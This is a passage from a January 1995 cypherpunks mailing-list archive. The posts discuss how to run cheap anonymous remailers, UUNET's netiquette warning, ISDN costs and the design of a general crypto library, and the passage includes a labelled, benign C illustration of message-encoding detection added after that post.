floppy were encrypted... or the kernel... ?  Could we use Matt Blaze's
CFS...?  Store the site-specifics on a data haven for backup... with
auto-download on bootup... notebook remailers in car trunks using RadioMail
or POP3 that have no single physical location... dynamic remailer
configuration (download your IP address and alias info, etc. from the
Remailer Server)...?  STOP THE WORLD, I WANT TO GET OFF!!!

There; that's better.

Maybe I'll play around this weekend and try building a minimal Linux
distribution (on what hard disk space :-).  Then again, maybe I won't, so
don't be bashful to play around on your own!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 12:04:37 PST
To: cypherpunks@toad.com
Subject: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192004.AA04647@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



It would appear that UUNET does not consider themselves to be a common
carrier any more -- they now claim the right to cut sites off for
violating netiquette.

.pm

------- Forwarded Message

From: help@uunet.uu.net (UUNET Customer Liaison)
Message-Id: <QQxzjt24313.199501191826@odin.UU.NET>
Subject: USENET "netiquette" Reminder
To: news-subscribers@uunet.uu.net
Date: Thu, 19 Jan 1995 13:26:40 -0500 (EST)

Because of recent improper use by users on AlterNet sites we are
sending out this reminder to all sites currently subscribing to news.
If you have not reviewed the accepted USENET netiquette with your users
recently we strongly suggest you take this opportunity to do so.

Before you or your users post to USENET, please take the time to learn
the rules of the environment which you are entering.  Doing so can make
the difference between creating a good name for you and your company on
the Internet or a bad one.

Please read the postings contained in news.announce.newusers to
familiarize yourself with the etiquette of USENET.  This information
may also be obtained via anonymous FTP at UUNET's archive (ftp.uu.net)
in the directory /usenet/news.answers/news-newusers-intro.Z  UUCP
customers may obtain the file via UUCP.

It is your responsibility to ensure that the users on your system are
also aware of the proper guidelines for posting to USENET.

Improper use of "netiquette", the guidelines of the USENET community,
will be viewed as a violation of the rules of a network.  This is in
violation of your contract with UUNET/AlterNet and will likely result
in a loss of news posting privileges for your site.

Tamara Bowman			help@uunet.uu.net
Manager Technical Support 	uunet!help
UUNET Technologies, Inc.


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 12:31:09 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501191958.LAA13462@netcom15.netcom.com>
Message-ID: <9501192029.AA04709@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> What are the cheapest "live connections" (24-hour a day connections)
> available? Where I am, about $100 a month, plus whatever the local
> phone company charges for a dedicated line.

In NYC, you can get a permanent dial up slip account for $75 per month
-- no dedicated line charges because there is no dedicated line per
se. Phone charges will add an additional $12 per month.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Jan 95 12:47:08 PST
To: cypherpunks@toad.com
Subject: Re: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192040.AA27218@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> It would appear that UUNET does not consider themselves to be a common
> carrier any more -- they now claim the right to cut sites off for
> violating netiquette.

Strange.

First, they were never a common carrier:  they went to some legal pains
to get registered as an enhanced service provider.  I don't know what
the differences are, but when the first "Internet Porn" article by Joe
Abernathy appeared years ago, Rick wasn't worried.  He told me ESP was
better than CC, but I don't remember why (perhaps it was no FCC regulation?)

It's unclear how this new policy affects their ESP status.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@versant.com
Date: Thu, 19 Jan 95 15:46:55 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: *.techwood.org
In-Reply-To: <ab449dd4080210041b10@[132.162.201.201]>
Message-ID: <9501192349.AA15217@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

THUS SPAKE jrochkin@cs.oberlin.edu (Jonathan Rochkind):
# 
# Maybe it's time for Eric to figure out what he's going to do 
# with remailer.net.

If anyone wants a third-level domain name *.techwood.org for their
linux box, send me mail *from root* on your box, telling me what
third-level name you want.  
(Techwood.org is the Techwood Broadcasting Foundation, incorporated
under orbital law.)

Put "techwood" in your Subject: line, and mail it to me at
<strick@techwood.org> from root at your site.  I will dig you and ping
you to get your dotted quad for an A record, and I'll make an MX record
that goes only to you.

			strick




p.s.  then in your /etc/sendmail.cf put a line like this

Cz mumble.techwood.org

(if you're running a recent UCB sendmail (like version 8.6 or later))
so that your site will accept mail destined to username@mumble.techwood.org.
(and kill -1 your sendmail daemon)




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLx75twq3IMgMJUNlAQE4JAH/Tolj835s+mLt6A2+AmH9rHIr7dUuYbZ5
VPIE4pnWn/CfQEx8DTwlKJN8Z5QlPfw/rWyahWpU/Thg7BbLypFfHg==
=N/Gq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:52:28 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
Message-ID: <9501192150.AA14796@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>> Jeff's response is exactly what I was hoping for! The "Cypherpunks
>> distribution" version of Linux would be a great way to spread cheap
>> remailer technology on cheap Linux boxes. Hell, I might even augment
>> my Macs with one of these things!
>
>One thing I should've noted is that a Linux-based cheap remailer is
>mostly useless without a "live connection" to the Net. That's why I
>mentioned hanging these directly off The Little Garden's net (i.e.,
>putting the box in the same building as the physical net, to avoid
>expensive connections).

Not necessarily.  Imagine, for example, a FidoNet or UUCP remailer.  It
might be nice for Internet users to have some kind of mail aliasing in the
DNS for you, but it wouldn't be required by any means.  I think it would be
better to have lots of remailers with ugly addresses (like
"jeff%jtj-l.uucp@cei.com", which is my address on my Linux box at home) than
only a few with nice ones.  (FidoNet has its own problems, such as paranoid
BBSes that disallow encrypted traffic, but that's another matter.)  These
remailers wouldn't even need to be up 24 hours; you could run it at night,
calling up on bootup and every hour thereafter or something.  It's not
perfect, to be sure, but what else is perfect?

I don't know how hard it is to get in on the local FidoNet, but UUCP isn't
too hard, and is a lot cheaper.  When I was in college, my college gave me a
feed for free.  I'm not so familiar with what providers charge.  Of course,
university accounts have their good and bad points; however, if you could
persuade someone offsite with control over a domain name (for example,
"remailer.net" :-) to give you a mail alias on their domain, this would take
a bit more effort to track than your typical "remailer.uiuc.edu" type
domain.  This would make it less likely that the university would hear
complaints, also, since most complainers would be more likely to complain to
"postmaster@remailer.net" than "postmaster@uiuc.edu" if your machine was
called "anon@anarchy.remailer.net" instead of "anon%anarchy.uucp@uiuc.edu"
or "anon@anarchy.uiuc.edu".

And this doesn't even get into the neato-cool new services you West Coasters
get, like RadioMail...

>What are the cheapest "live connections" (24-hour a day connections)
>available? Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

Around here, it isn't even available unless you access through the
CompuServe numbers or call long distance (read: $$$).  That may be changing
soon...

>So, even an el cheapo 486-based Linux box, for perhaps $800 or so,
>would need to solve the problem of a cheap, continuous connection to
>the Net. (My supposition is that one approach is to share these
>connections, hence my notion of hanging machines on other people's
>nets.)

No need for even a 486.  If it takes an hour to process a remailer script,
so much the better for the mix.  You could call it a "required latency
feature". :-)

>Are there options for several machines to share a connection? (I'm
>sure there are....). Someone who already has a connection may be
>willing to host additional machines, which could share some of the
>charges.

Set up correctly, these "Remailer-In-A-Box" type machines could do several
things to share a connection.  They could, for example, all be connected
with serial cables and use UUCP to get mail where it needs to go.  I
believe, in addition, that you can chain up to three deep with PLIP.  This
of course assumes that Ethernet isn't an option.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Thu, 19 Jan 95 13:20:22 PST
To: cypherpunks@toad.com
Subject: Internet World Magazine
Message-ID: <199501192119.QAA21262@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


This month's issue of Internet World Magazine deals primarily with internet 
security. I'm not going to review everything in the mag but I'll list the 
table of contents:

Better Safe:
Danger lurks on the Info Highway. You must take precautions to reduce your risks.
By Dave Taylor and Rosalind Resnick

Getting Cryptic:
Phil Zimmermann's PGP gives you powerful encryption to keep your messages 
safe from prying eyes. Read all about it.
By William Stallings.
(Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise:
Connecting your corporation to the Internet can be a security nightmare.
Firewalls are the main line of defense.
By Alton Hoover
(An overview of Firewalls, application-layer gateways and token-based 
authentication schemes)

Beyond the Firewall:
The latest firewall technology not only detects intruders, but strikes back.
By Winn Schwartau
(Very interesting article. Here are some quotes to whet your appetite:
Wouldn't it be nice if a computer system attacked from the Internet 
responded to the attack by striking back at the intruder? This is exactly 
what Sidewinder's implementation of type enforcement does.....It will detect 
the intrusion immediately....As soon as a violation occurs, a silent alarm 
is activated....sidewinder can be configured to react in any number of ways, 
once an attack has been detected...it can shut the intruder cold...(or)...it 
can invoke a mechanism that would record all the information from whence 
came the attack....By luring the attacker into a false sense of security, 
the hacker would continue trying to break in, unaware that every step was 
being recorded...

Cashing In:
As Internet commerce expands, a host of companies are vying to establish 
their system as the basis for cyberbanking and credit-card transactions.
By Lisa Morgan

Business Browser:
New versions of Mosaic with built-in encryption promise to keep your 
transactions safe.
By Richard W. Wiggins

Unlawful Entry
Crackers can feast on your data if you fail to plug your leaky Unix system
By Aaron Weiss
(Five Ways to crack a Unix System)

It's Alive:
Although the furor has subsided, reports of Clipper's death are greatly 
exaggerated. The government's controversial eavesdropping effort lives on.
By Steven Vaughan-Nichols

Building Trust
The chief executives of Trusted Information Systems -Steve Crocker and Steve 
Walker- talk about encryption, CyberCash, Clipper, and more.
By Jeff Ubois.

All in all a rather interesting mag. Check it out.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Thu, 19 Jan 95 13:25:48 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <199501192123.AA29095@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:14 AM 1/19/95 -0800, Timothy C. May wrote:

>* I favor separating the "account that remails" from the "owner of the
>site," as I have argued in vain in the past. (Example: a willing site
>gives out or sells many accounts...each is legally separate, and each
>must be legally challenged. My longer posts dealt with this.)

I offer to pay for and operate a remailer account on any system that will
have me.

Do we have the software yet to run a remailer out of an account?

>It's time to get cracking on this crisis.

The Cable companies may come to our rescue.  Even old fuddy-duddy
Cablevision is going to be offering connections this year.  If those
connections are characterised merely as physical connections, that could
offer legal protections.

My contrib for now will be to draft an all purpose response letter to
respond to civilian and official complaints concerning remailer abuse.

DCF

- --
You know, Private Idaho brings PGP signing within about 10 keystrokes in any
Windows mailer.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx6vUYVO4r4sgSPhAQFjzgP/ZVAonNBsZpMCg/tlWohvC7ratGTZWtCz
/WXC+Z1PAKhigdz8VhWhkPXLj/jYba1LUMBI9giNP6T9TSxMw6jjzgvs44tw4LF4
X0pF/lv9OS7GKcPw//4FyB1FKgfwpJA+mHr8gqlLrxREXv3qpHfKRuu/ecg5urmS
jwiSSKsjZhU=
=Aoq4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 19 Jan 95 16:27:26 PST
To: cypherpunks@toad.com
Subject: Re: *.techwood.org
In-Reply-To: <9501192349.AA15217@versant.com>
Message-ID: <199501200027.QAA10644@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   # Maybe it's time for Eric to figure out what he's going to do 
   # with remailer.net.

Standardization, is what.  It's not ready, so no names yet.

   From: strick@versant.com

   If anyone wants a third-level domain name *.techwood.org for their
   linux box, send me mail *from root* on your box, telling me what
   third-level name you want.  

This is the right avenue right now for a non-.edu remailer address.
Immediate, cheap, etc.

And incidentally, it's a great idea to use a different domain name for
these services.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 19 Jan 95 16:33:41 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <199501192123.AA29095@panix.com>
Message-ID: <199501200033.QAA10651@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: frissell@panix.com (Duncan Frissell)

   I offer to pay for and operate a remailer account on any system that will
   have me.

best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
the other standard extensions.

I'm sure there are others.

   Do we have the software yet to run a remailer out of an account?

When I wrote the first cypherpunk remailer, this was a design
criterion.  In other words, yes.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 19 Jan 95 14:43:31 PST
To: cypherpunks@toad.com
Subject: AT&T IVES chip
Message-ID: <9501192243.AA21298@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Interpretive Summary From PC Week:

"Security Chip, interface aim to assist Electronic Commerce"

AT&T IVES (Information Vending Encryption System) chip will
encrypt data, video on demand, banking, etc.

The IVES chip will be used in AT&T cable-TV-boxes this year.

It is available to OEM's for Internet data security applications.

IVES uses algorithms licensed from RSA.

No mention of any dreaded built-in peephole.

---------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 16:56:16 PST
To: jcorgan@scruznet.com (Johnathan Corgan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501200054.QAA11075@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Johnathan Corgan wrote:

> I am currently using ISDN from my home in San Jose.  You're right in 
> that the startup costs are the barrier--even a cheap single B channel 
> (56K) terminal adapter for use with a serial port will run $300-$400
> dollars.  The telco charges are minimal in my area; $25 monthly for
> the line itself (115 Kbps async bandwidth).  Connect charges are free 
> for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
> Mon-Fri.

Well, let's do the math. Since the remailer has to be connected at all
times, of course, this implies $162 a month in connect charges, over
and above the other charges. Or $187 a month including the line
charge. Or $2244 a year. 

This makes a "cheap Linux box" almost a moot point. This is a lot more
than I'm willing to pay to run a remailer.

(I can imagine workarounds that involve connecting at regular
intervals to pick up mail....assuming it "accumulates" somewhere (?),
but the goal of a remailer "on the Net" is what I'm after.)

> A remailer in this scenario would need to have their MX record point to
> their ISP, and process mail via POP (incoming) and SMTP (outgoing).  
> It would be straightforward to implement a timed or demand dial scenario 
> (say, every fifteen minutes) to accomplish this.  While not the ideal 
> (continuous internet connection with pure SMTP based mail transport), it
> would suffice for a moderately loaded remailer, I'd imagine.
> 
> Of course, this involves the mail subsystem of your ISP, partially
> defeating the purpose of having ubiquitous anonymous remailer "instances"
> whose operation is outside the control of an ISP.  Still, it would be
> a good start.

I agree that it's something to look at.

--Tim May



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Jan 95 17:08:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <199501200105.RAA05837@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    From: frissell@panix.com (Duncan Frissell)
> 
>    I offer to pay for and operate a remailer account on any system that will
>    have me.
> 
> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
> the other standard extensions.
> 
> I'm sure there are others.
> 

	To my knowledge there exist 3 packages which allow you to run
a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance
Cottrell?), and the simple package available on ftp.csua.berkeley.edu,
which derives from Eric and Hal's original code.

	c2.org, of course, welcomes remailers.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 19 Jan 95 15:42:38 PST
To: jcorgan@scruznet.com (Johnathan Corgan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501192344.RAA03508@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> I am currently using ISDN from my home in San Jose.  You're right in 
> that the startup costs are the barrier--even a cheap single B channel 
> (56K) terminal adapter for use with a serial port will run $300-$400
> dollars.  The telco charges are minimal in my area; $25 monthly for
> the line itself (115 Kbps async bandwidth).  Connect charges are free 
> for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
> Mon-Fri.
>
I am also using ISDN to get my network on through Southwestern Bell.
The charges I had to deal with were:

$135 deposit (refunded in 2 years)
$73 per month line rate (2B+D)
$350 per month for ISDN connection to another system on Internet and in
     Austin there is only one system that can do this for .com sites.
     This is a common problem all over the country I understand.
$1150 for Combinet 160 w/ NT-1 for ISDN-Ethernet bridge.
$750 for account setup and for the folks at the other end to configure.

This is a little expensive for home use but well within the means of even
small businesses. 
 
> This is the Pacific Bell "Residential" ISDN plan.  For business lines,
> it goes up to $50 monthly with $0.60/hour 24 hours a day.
>

I am lucky in that I am flat rate.
  
> In addition to this would apply any standard long distance charges that
> would apply to a particular call.
> 
 
We get charged only for the D channel traffic which is usually used for call
progress control. In general we don't use the D channel at all.
 
> This is an excellent setup for fast, cheap, INTERMITTENT connection to 
> the Internet.  My particular ISP is in Santa Cruz, with POPS in SC, SJ,
> and soon Monterey.  An unlimited connect time PPP account runs $75 monthly.
> This actually gets me a three bit subnet so that I can put five IP boxes 
> and an ISDN router on my ethernet at home.
> 

It is clean, fast (300kbs w/ compression), and economical for a full time
feed as well.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 19 Jan 95 14:54:52 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <ab449dd4080210041b10@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:49 PM 01/19/95, Jeff Licquia wrote:
>persuade someone offsite with control over a domain name (for example,
>"remailer.net" :-) to give you a mail alias on their domain, this would take
>a bit more effort to track than your typical "remailer.uiuc.edu" type
>domain.  This would make it less likely that the university would hear
>complaints, also, since most complainers would be more likely to complain to
>"postmaster@remailer.net" than "postmaster@uiuc.edu" if your machine was
>called "anon@anarchy.remailer.net" instead of "anon%anarchy.uucp@uiuc.edu"
>or "anon@anarchy.uiuc.edu".

I was thinking of this same thing.  I'm hopefully going to have a unix box
on the net in my college dorm room soon, but I'm a bit hesitant to run a
remailer on it.   I'm a bit scared to ask whether it would be allowed, on
the "it's better to get forgiveness than permission" line of thought.  But
I'd rather avoid the potential of having to get forgiveness either.  If my
site had a "machine.remailer.net" address, there would be many benefits.
For one, I don't have to worry about some administrator coming across a
list of anon remailers (in a Time magazine scare-tactic article, eek!), and
noticing that one of them appears to be operating from some student's dorm
room, and secondly, as Jeff says, people who complain are just going to
complain to admin@remailer.net. They aren't going to take the time to try
to figure out that my IP address is really in oberlin.edu, and complain to
postmaster@oberlin.edu.  So administration@oberlin would never even realize
I was running a remailer, and since they haven't yet made any indication
that that would be against the rules, I would be in a good position.

Maybe it's time for Eric to figure out what he's going to do with remailer.net.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Insomnia Gallumbits <cactus@hks.net>
Date: Thu, 19 Jan 95 15:01:58 PST
To: cypherpunks@toad.com
Subject: Status of GUCAPI
Message-ID: <199501192306.SAA16798@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm just about done with the first part of my crypto library, the
internal generalized I/O, and largely done with the framework for the
encoding rules.  Since I haven't fully outlined what I'm doing here,
I thought I'd mention the outline in the hopes of getting some real
feedback and perhaps some random snippets of code.

In essence, what I'm building is a crypto library that takes a very general
approach with a few parameters controlling its behavior.  The idea is
to have something that anybody can drop into their mail agent and have
an easy way of using crypto and interface with existing systems such as
PGP.  A major design goal is to be backwards compatible with PGP, but
paramount is having a plug-and-play library that will be flexible enough
to meet future crypto needs.

One of the biggest problems today is that crypto libraries are chiselled out
to deal with very specific cases -- the most general I know of is RSAREF,
which AFAIK only supports BER/DER for encoding and RSA and DES/CBC for 
encryption.  I'll grow more clueful on that, and other crypto and key
management issues, as I get to actually working on them.

The things that I've parametrized in the design are:

	- Type of I/O.  Right now, files (and fds) and a couple of memory
	 configurations	are supported.  I've made it trivial to add new
	 types of I/O as well, and there are flags to support
	 immediate zeroing of data once it is read into the internal
	 structures.

	- Encoding of data.  There are multiple ways to encode a bytestream
	 and these methods can be nested.  For example, PGP, MIME, and
	 uuencode use their own formats.  In this library, you can specify
	 the type.  I also want to eventually put logic in (where possible)
	 to determine the type and will also use this to support various
	 compression schemes.

	- Ciphers (this is the big one).  Right now, as I've mentioned,
	 things are very haphazard.  What I want is a way to change one
	 parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and
	 thus change the encryption scheme.

	- Key management.  I know of two major ways of doing things
	 right now, X.509/PEM certificates as pushed by RSADSI, and
	 PGP web-of-trust.  As far as I can tell, PEM-style certificates
	 are just a degenerate case of PGP web-of-trust.

	- Random sources.  People should be offered a pretty good source
	 of random numbers, but should also be allowed to drop in their
	 own sources.  This is going to be relatively tough on platforms
	 I don't know much about, IE Mac and PC, but I'm hoping for some
	 help on this.  I can also salvage some code from RIPEM for those.

	- Autoconfiguration to incoming messages.  People should be
	 able to open a file and have it work, even with schema added
	 to the library after the original adaption to GUCAPI.

There's some other stuff that I'm probably forgetting here, but that's
the gist of it.  The cipher code is going to be pretty simple: I'm
getting a lot of code from various places on the net;  the code exists,
it just isn't put into a form that is easy to use.  The most difficult is
going to be a generalized scheme for key management: first off, I'm probably
going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM
style certificates can be treated as degenerate cases of web of trust.

I also intend to offer a GSSAPI interface to all of this, as seems
appropriate when I get to it.

This is so far all in C: I'm not a C++ convert yet and C is still the
most portable of the languages about.  Later, perhaps class libraries
can be designed around the same code.

Thoughts?  Am I wasting my time, or is this a worthwhile pursuit?
And should I find a better name than GUCAPI?

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx7wfCoZzwIn1bdtAQGIWAF9GgY29Qop9p1TEryO3oe/cFUyyBAJQtp7
yPGjEDyCvk/vtLHTAxhQoMTE98MMkPP1
=EoBl
-----END PGP SIGNATURE-----
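
An added illustration of the "Encoding of data" and "Autoconfiguration to incoming messages" items in the post above; it is not part of Todd's message and is not GUCAPI code. Every identifier (`enc_detect`, `enc_register`, the `ENC_*` values) is hypothetical, and the sample inputs are constructed. Nested layers are found by calling `enc_detect` again on the text after the matched line.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* All identifiers are hypothetical; GUCAPI's real names are not on the page. */
enum { ENC_UNKNOWN = 0, ENC_PGP_ARMOR, ENC_UUENCODE, ENC_MIME, ENC_USER = 100 };
typedef int (*enc_probe)(const char *line, size_t len); /* nonzero: line opens it */
typedef struct { int type; const char *name; enc_probe probe; } enc_scheme;

/* Case-insensitive prefix test that never reads past len. */
static int has_prefix_ci(const char *line, size_t len, const char *prefix)
{
    size_t n = strlen(prefix);
    if (len < n) return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)prefix[i]))
            return 0;
    return 1;
}

/* PGP armor header: "-----BEGIN PGP <label>-----" alone on a line. */
static int probe_pgp(const char *line, size_t len)
{
    static const char head[] = "-----BEGIN PGP ";
    size_t n = sizeof head - 1;
    return len > n + 5 && memcmp(line, head, n) == 0
        && memcmp(line + len - 5, "-----", 5) == 0;
}

/* uuencode header: "begin <3 or 4 octal digits> <filename>". */
static int probe_uu(const char *line, size_t len)
{
    size_t i = 6, digits = 0;
    if (len < 6 || memcmp(line, "begin ", 6) != 0) return 0;
    while (i < len && line[i] >= '0' && line[i] <= '7') { i++; digits++; }
    return (digits == 3 || digits == 4) && i + 1 < len && line[i] == ' ';
}

static int probe_mime(const char *l, size_t n) { return has_prefix_ci(l, n, "MIME-Version:"); }

/* A scheme added after the fact: the BinHex 4.0 banner line. */
static int probe_binhex(const char *line, size_t len)
{ return has_prefix_ci(line, len, "(This file must be converted with BinHex"); }

#define MAX_SCHEMES 16
static enc_scheme registry[MAX_SCHEMES] = {
    { ENC_PGP_ARMOR, "pgp-armor", probe_pgp },
    { ENC_UUENCODE,  "uuencode",  probe_uu },
    { ENC_MIME,      "mime",      probe_mime },
};
static size_t n_schemes = 3;

/* Add a scheme at run time; callers of enc_detect() need no changes. */
int enc_register(int type, const char *name, enc_probe probe)
{
    if (n_schemes == MAX_SCHEMES || probe == NULL) return -1;
    registry[n_schemes++] = (enc_scheme){ type, name, probe };
    return 0;
}

/* Type of the first line any probe accepts; *where receives its offset. */
int enc_detect(const char *buf, size_t len, size_t *where)
{
    for (size_t start = 0; start < len; ) {
        const char *nl = memchr(buf + start, '\n', len - start);
        size_t end = nl ? (size_t)(nl - buf) : len;
        size_t linelen = end - start;
        if (linelen && buf[end - 1] == '\r') linelen--;   /* tolerate CRLF */
        for (size_t i = 0; i < n_schemes; i++)
            if (registry[i].probe(buf + start, linelen)) {
                if (where) *where = start;
                return registry[i].type;
            }
        start = end + 1;
    }
    return ENC_UNKNOWN;
}

/* Constructed sample inputs, not taken from the page. */
static const char SAMPLE_MIME_PGP[] =
    "From: alice@example.org\nMIME-Version: 1.0\nContent-Type: text/plain\n\n"
    "-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n(placeholder body)\n"
    "-----END PGP MESSAGE-----\n";
static const char SAMPLE_UU[] =
    "begin 1995 with a clean slate\r\nbegin 644 notes.txt\r\n(placeholder body)\r\nend\r\n";
static const char SAMPLE_BINHEX[] =
    "(This file must be converted with BinHex 4.0)\n:(placeholder body):\n";

int main(void)
{
    size_t at = 0;
    int outer = enc_detect(SAMPLE_MIME_PGP, strlen(SAMPLE_MIME_PGP), &at);
    const char *rest = strchr(SAMPLE_MIME_PGP + at, '\n') + 1; /* skip matched line */
    printf("outer=%d inner=%d\n", outer, enc_detect(rest, strlen(rest), NULL));
    printf("uu=%d\n", enc_detect(SAMPLE_UU, strlen(SAMPLE_UU), NULL));
    enc_register(ENC_USER, "binhex", probe_binhex);
    printf("binhex=%d\n", enc_detect(SAMPLE_BINHEX, strlen(SAMPLE_BINHEX), NULL));
    return 0;
}
```

A sniffed type is only a hint taken from one header line, so the decoder selected for it still has to validate the body it is handed.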




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 19 Jan 95 15:27:14 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Electronic cash illegal?
In-Reply-To: <9501190336.AA12782@toxicwaste.media.mit.edu>
Message-ID: <Pine.SUN.3.91.950119182200.13361A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Derek Atkins wrote:

> The US dollar is backed by trust alone, today.

Actually, the "backing" of a fiat currency is the need to have some 
around to pay your taxes, else you go to jail.  You are taxed on many 
types of income, even if they are not directly exchanged in the fiat 
currency.  Somehow you have to get some.

This also means that higher taxes can make the currency more desirable, 
lower taxes less, higher government spending less, lower government 
spending more, etc.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Thu, 19 Jan 95 16:24:37 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510100ab44b238a442@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just out of curiosity on this subject, is there any remailer software for
Macs? I think I have enough leverage and power on my campus to be able to
run a remailer here during the school months *which is when I have net
access*.  If there isn't, how hard would it be to do? Could it be done with
something like MailShare indirectly?

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLx8CQkiLvmPjc4XdAQFS4wP/aufMYK054Ed5fZn84xLDSsXqF3+hv4jw
uQKSUl6Kv46Ek+IypX0DwI31SqasS96vosC0W/p9uPO/MFoAyp9/EdcAkH65yWSO
